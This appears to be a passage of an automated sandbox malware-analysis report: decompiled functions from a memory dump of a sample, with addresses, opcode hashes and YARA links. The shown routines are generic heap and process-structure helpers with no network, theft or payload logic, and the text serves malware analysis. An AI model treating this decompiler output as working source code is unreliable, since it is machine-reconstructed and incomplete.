                    0x016e53e1
                    0x016e53e6
                    0x016e53f3
                    0x00000000
                    0x016e53f8
                    0x016e53fb

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                    • Instruction ID: de7e1ec319098c33bcd7e60aa12612aa0ac8c990812b5cd2458256b224c95720
                    • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                    • Instruction Fuzzy Hash: 58E08C359007809BCF12EB48CE54F5EBBF6FB44B00F240048A0095B720C764AC00CB00
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0167AAB0 Relevance: .0, Instructions: 12COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0167AAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                    0x0167aab6
                    0x0167aabb
                    0x016ca442
                    0x00000000
                    0x016ca448
                    0x016ca454
                    0x016ca454
                    0x0167aac1
                    0x0167aac1
                    0x0167aac6
                    0x0167aac6

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                    • Instruction ID: b92b655d56b4a52082126c3ba4816ca9f900695b1777e1322c2614339ba31d9c
                    • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                    • Instruction Fuzzy Hash: F0D0E935352980CFD617DB5DC954B1577A4FB44B44FC54594E941CB762E72CD944CA00
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016935A1 Relevance: .0, Instructions: 12COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E016935A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E0167EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






                    0x016935a1
                    0x016935a1
                    0x016935a5
                    0x016935ab
                    0x016935ab
                    0x016935b5
                    0x00000000
                    0x016935c1
                    0x016935b7

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                    • Instruction ID: 32c99856af0ff296a914d596201a01ae0789f51aedc0137b4bc67704943b39cc
                    • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                    • Instruction Fuzzy Hash: EFD0A9314011819BEF02AB34CE187683BBABB08208F5820AA80024EB62C33A4A0EC604
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0166DB40 Relevance: .0, Instructions: 11COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0166DB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L01684620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                    0x0166db4d
                    0x0166db54
                    0x0166db5f
                    0x0166db56
                    0x0166db56
                    0x0166db5c
                    0x0166db5c

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                    • Instruction ID: 357216171d3eceb067be81d618fbd8f26f26fb39b0d46ac53aa302ceefcf128f
                    • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                    • Instruction Fuzzy Hash: 10C08C70380A12AAEB222F20CD01B003AA5BB50B05F4400A06300DA0F0EF78D801E600
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016EA537 Relevance: .0, Instructions: 11COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E016EA537(intOrPtr _a4, intOrPtr _a8) {

				return L01688E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



                    0x016ea553

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                    • Instruction ID: f45994dd3235d14dc6cd24a6c14337d23ce0eea65efe0808be59719537628cbd
                    • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                    • Instruction Fuzzy Hash: 9AC01236080248BBCB126F81CC00F067B2AFBA4B60F008014BA080B5A08632E970EA88
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01683A1C Relevance: .0, Instructions: 10COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E01683A1C(intOrPtr _a4) {
				void* _t5;

				return L01684620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                    0x01683a35

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                    • Instruction ID: c12ef7a529cbcd483df21ad6427eb0b6ae0acbf6443c1c1ee267d7bde3c1cbcd
                    • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                    • Instruction Fuzzy Hash: 80C08C32080248BBC7126E41DC00F017B2AE7A4B60F000020B6040A5608A32ECA0D58C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0166AD30 Relevance: .0, Instructions: 10COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0166AD30(intOrPtr _a4) {

				return L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                    0x0166ad49

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                    • Instruction ID: 7e34e645b190efc93c87af7f255c19b673554c5a4bca59a5e6fb1adc3b0f882b
                    • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                    • Instruction Fuzzy Hash: 3FC08C32080248BBC7127A45CD00F117B2AE7A0B60F100020F6040A6618972E860D588
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016776E2 Relevance: .0, Instructions: 10COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E016776E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}




                    0x016776e4
                    0x00000000
                    0x016776f8
                    0x016776fd

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                    • Instruction ID: e9465bb8ccb6e63a9f24deb224348a7b16980886d957dd7d6f13f0fb714f9983
                    • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                    • Instruction Fuzzy Hash: 84C08C701411805AEB2A670CCE28B303A50AB08608F58029CAB01096A2C3A8A823CA08
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016936CC Relevance: .0, Instructions: 10COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E016936CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L01684620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}



                    0x016936d2
                    0x016936e8
                    0x016936d4
                    0x016936e5
                    0x016936e5

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                    • Instruction ID: c8a8cc400ee30017a7b9d5725549bbfc1e06309b4cb3f10f94b123ecc268f575
                    • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                    • Instruction Fuzzy Hash: 87C02B70150450FBDB252F30CD00F247258F700A21F6403587220456F0EF289C00D104
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01687D50 Relevance: .0, Instructions: 7COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E01687D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                    0x01687d56
                    0x01687d5b
                    0x01687d60
                    0x01687d5d
                    0x01687d5d
                    0x01687d5d

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                    • Instruction ID: 1a770cb13ae36b14a3a7e46c2e57c0153ad919513caa15887fae89482b9b2e81
                    • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                    • Instruction Fuzzy Hash: 44B092363019408FCE16EF18C480B1533E4FB44A40B9400D0E400CBA21D329E8008900
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01692ACB Relevance: .0, Instructions: 5COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E01692ACB() {
				void* _t5;

				return E0167EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}




                    0x01692adc

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                    • Instruction ID: 7c3137c52729dadda63cd1335ed6a257885c76f3c77583725813febb1ad83ff0
                    • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                    • Instruction Fuzzy Hash: 2EB01232C10441CFCF02EF40CF10B297732FB00B50F0544D5900127930C329AC01CB40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016A9950 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8f126ed55de881162eff4012366aafa7b27cb1f6f35cb1ebb80a55d93971f895
                    • Instruction ID: ede3fe28e192ced9ac2b320b64307ea5110413a5071d9a74eb03918aa1d5978b
                    • Opcode Fuzzy Hash: 8f126ed55de881162eff4012366aafa7b27cb1f6f35cb1ebb80a55d93971f895
                    • Instruction Fuzzy Hash: A39002A121140403D18069994C456470009E7D0346F51C021A2054955ECB699C917275
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016A99D0 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6b511465533ae21ee06c6a0aef92c89c472643c01d252065e1adaf04355008cc
                    • Instruction ID: 6f98039c10d1bd5cc000c3387839a1a3a9ebb92aebe93f0fa06c0f64e7f7c8e5
                    • Opcode Fuzzy Hash: 6b511465533ae21ee06c6a0aef92c89c472643c01d252065e1adaf04355008cc
                    • Instruction Fuzzy Hash: 7B9002A122100043D144659948457470049E7E1245F51C022A2144954CC6699CA16265
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016AB040 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: deb4f5f5ba24b9558346dd70c636731b641d97cb959359f38a7227a5b2e9df86
                    • Instruction ID: 3b7052feeadd6c831cf81207b6c207cff17519dd0b28d5dd2fdd398cfa99f3c5
                    • Opcode Fuzzy Hash: deb4f5f5ba24b9558346dd70c636731b641d97cb959359f38a7227a5b2e9df86
                    • Instruction Fuzzy Hash: 249002A1611140434580B5994C454475019F7E1345391C131A0444960CC7A89895A3A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016A9820 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4ee9d1515b0531a7a448368eed2ce60f1ce4ba84e74b6523ab15d4ef541dcb38
                    • Instruction ID: cfdbc295c759539ae1d2672ce52b35a1c46354073574d6becdfbf2d6e168d3fb
                    • Opcode Fuzzy Hash: 4ee9d1515b0531a7a448368eed2ce60f1ce4ba84e74b6523ab15d4ef541dcb38
                    • Instruction Fuzzy Hash: E790027125100403D18175994845647000DF7D0285F91C022A0414954EC7959A96BBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016A98A0 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 67af73f35dffcabc79a75d9a568acf080d3f27994a9e98714a631463eccc5c91
                    • Instruction ID: e0a0f40578d3357ec263ea5dcb607070463e9a73c87fbafee045343f3145a331
                    • Opcode Fuzzy Hash: 67af73f35dffcabc79a75d9a568acf080d3f27994a9e98714a631463eccc5c91
                    • Instruction Fuzzy Hash: F490026131100403D14265994855647000DE7D1389F91C022E1414955DC7659993B272
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016A9B00 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e6eeead3f7a82c5c1aac60aaf564e045e85eda7da1e1610c2345fb54de4ac0c5
                    • Instruction ID: b35be203d62e5f30cb7fedebf0e8f5bdd0870686752a13c618020f7c9a5ab54d
                    • Opcode Fuzzy Hash: e6eeead3f7a82c5c1aac60aaf564e045e85eda7da1e1610c2345fb54de4ac0c5
                    • Instruction Fuzzy Hash: 6A90026125100803D18075998855747000AE7D0645F51C021A0014954DC75699A577F1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016AA3B0 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 595d500d9a6eff6f70b2be89fd9b53bdfcf28e0ee7bc5326b147665eec74eaeb
                    • Instruction ID: 3b690c10017b45e4420bc54812d5618e2f1d629410b7fa9d159da0fe10d0f647
                    • Opcode Fuzzy Hash: 595d500d9a6eff6f70b2be89fd9b53bdfcf28e0ee7bc5326b147665eec74eaeb
                    • Instruction Fuzzy Hash: 6890027121144003D1807599888564B5009F7E0345F51C421E0415954CC7559896A361
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016A9A10 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0085488662818673795f17af85bbfd13c54263c6d6eb3b2a15ae69075341ce6d
                    • Instruction ID: 5902a1a1ba8b750250dd129527ac6625609908ba19650a1610c8e3c2382db683
                    • Opcode Fuzzy Hash: 0085488662818673795f17af85bbfd13c54263c6d6eb3b2a15ae69075341ce6d
                    • Instruction Fuzzy Hash: 3F90027121140403D14065994C497870009E7D0346F51C021A5154955EC7A5D8D17671
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016A9A80 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 80c3b95560e33816a9e188471c052c2f813c1d61378b29fce64132779fb606e0
                    • Instruction ID: 524ff479d5b79dc69f5baac5b1f148731b10fe3f1e2db64bd943bbfe55ab8366
                    • Opcode Fuzzy Hash: 80c3b95560e33816a9e188471c052c2f813c1d61378b29fce64132779fb606e0
                    • Instruction Fuzzy Hash: 6590026121144443D18066994C45B4F4109E7E1246F91C029A4146954CCA5598956761
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016A9560 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 541bb57a872135f5db5fab2a7d37fde470062ac2b1c9244d42683c6548fe0675
                    • Instruction ID: a0eae347f486ed9caf93daa5077ff62113e55d92ed604fd8ecd8abb6c9ff6afc
                    • Opcode Fuzzy Hash: 541bb57a872135f5db5fab2a7d37fde470062ac2b1c9244d42683c6548fe0675
                    • Instruction Fuzzy Hash: E9900265231000030185A9990A4554B0449F7D6395391C025F1406990CC76198A56361
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016A9520 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 562ebe707a1d35aee923ae4af1c6b79f1ab46950401d5b62492bdfc7cb5c9080
                    • Instruction ID: e56ef417a1065192210dc3bfa1d2981f13c18e539ca541528aef1b8c74116648
                    • Opcode Fuzzy Hash: 562ebe707a1d35aee923ae4af1c6b79f1ab46950401d5b62492bdfc7cb5c9080
                    • Instruction Fuzzy Hash: 1E9002E1211140934540A6998845B4B4509E7E0245B51C026E1044960CC6659891A275
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016AAD30 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 94d7a26a486105921d8e134d06d09ba9625276f7424b4f49bf09040f25be3bac
                    • Instruction ID: 0f9f06f458b49dbba6d0e3c329fb887d919bd317c64681f5330494da38214070
                    • Opcode Fuzzy Hash: 94d7a26a486105921d8e134d06d09ba9625276f7424b4f49bf09040f25be3bac
                    • Instruction Fuzzy Hash: 40900271A1500013918075994C55687400AF7E0785B55C021A0504954CCA949A9563E1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016A95F0 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 435731a53d38bd14e6983c6aa2837a0d9c00948f8b276d0b305dbbfc6df2e994
                    • Instruction ID: 0995632cc9b635156b3ee88233eb3ee1e2c9ee946e41812404f7866059f915e2
                    • Opcode Fuzzy Hash: 435731a53d38bd14e6983c6aa2837a0d9c00948f8b276d0b305dbbfc6df2e994
                    • Instruction Fuzzy Hash: B890027121100803D14465994C456C70009E7D0345F51C021A6014A55ED7A598D17271
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016A9760 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e781d936f7a60c7872abef432bfd8260b42cf3d43f12d9a62cf20679712ea572
                    • Instruction ID: 73ac240ca19d849af82ce0d2d7d6bcad1859179921f839d3329f69af694e6253
                    • Opcode Fuzzy Hash: e781d936f7a60c7872abef432bfd8260b42cf3d43f12d9a62cf20679712ea572
                    • Instruction Fuzzy Hash: CD90027121100403D140659959497470009E7D0245F51D421A0414958DD79698917261
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016AA770 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8d8ea05a258165522e6bcb3c52e8058a24b162ef56501b2a807372ca5e1d59b1
                    • Instruction ID: 6ee5fc28846fb39b7412230009c39b720f2d906e4c38ce9e66e47f636e2ff0a2
                    • Opcode Fuzzy Hash: 8d8ea05a258165522e6bcb3c52e8058a24b162ef56501b2a807372ca5e1d59b1
                    • Instruction Fuzzy Hash: A690027521504443D54069995C45AC70009E7D0349F51D421A041499CDC79498A1B261
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016A9770 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2ee3c7dfbe1ed30f7f527246fcfc8b028102610bc3d5b9e9d2bb20d789d2e72a
                    • Instruction ID: 944e39801ddf3ac9bdee7fd049d309ff77e8cf8b558111cfe1dcbca1c40d95e6
                    • Opcode Fuzzy Hash: 2ee3c7dfbe1ed30f7f527246fcfc8b028102610bc3d5b9e9d2bb20d789d2e72a
                    • Instruction Fuzzy Hash: 5A90026121504443D14069995849A470009E7D0249F51D021A1054995DC7759891B271
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016A9730 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ee5b946911875c26814bf86102c72b3c7568227e35072b0302e35e9f42be7a31
                    • Instruction ID: fc918009655eb8252a2d5608ff30f45c5df944218ebac1a8660eadeca046c1d2
                    • Opcode Fuzzy Hash: ee5b946911875c26814bf86102c72b3c7568227e35072b0302e35e9f42be7a31
                    • Instruction Fuzzy Hash: F990026161500403D180759958597470019E7D0245F51D021A0014954DC7999A9577E1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016AA710 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d57e919465e7b3411ad93a7dc2d8e54da6262f5a0ee46d4502c96a2717130a6a
                    • Instruction ID: 44acec611a362b392f7ee210f8dfed96afa6beee256e8c3d11a8719b2dab2755
                    • Opcode Fuzzy Hash: d57e919465e7b3411ad93a7dc2d8e54da6262f5a0ee46d4502c96a2717130a6a
                    • Instruction Fuzzy Hash: 57900271311000539540AAD95C45A8B4109E7F0345B51D025A4004954CC69498A16261
                    Uniqueness

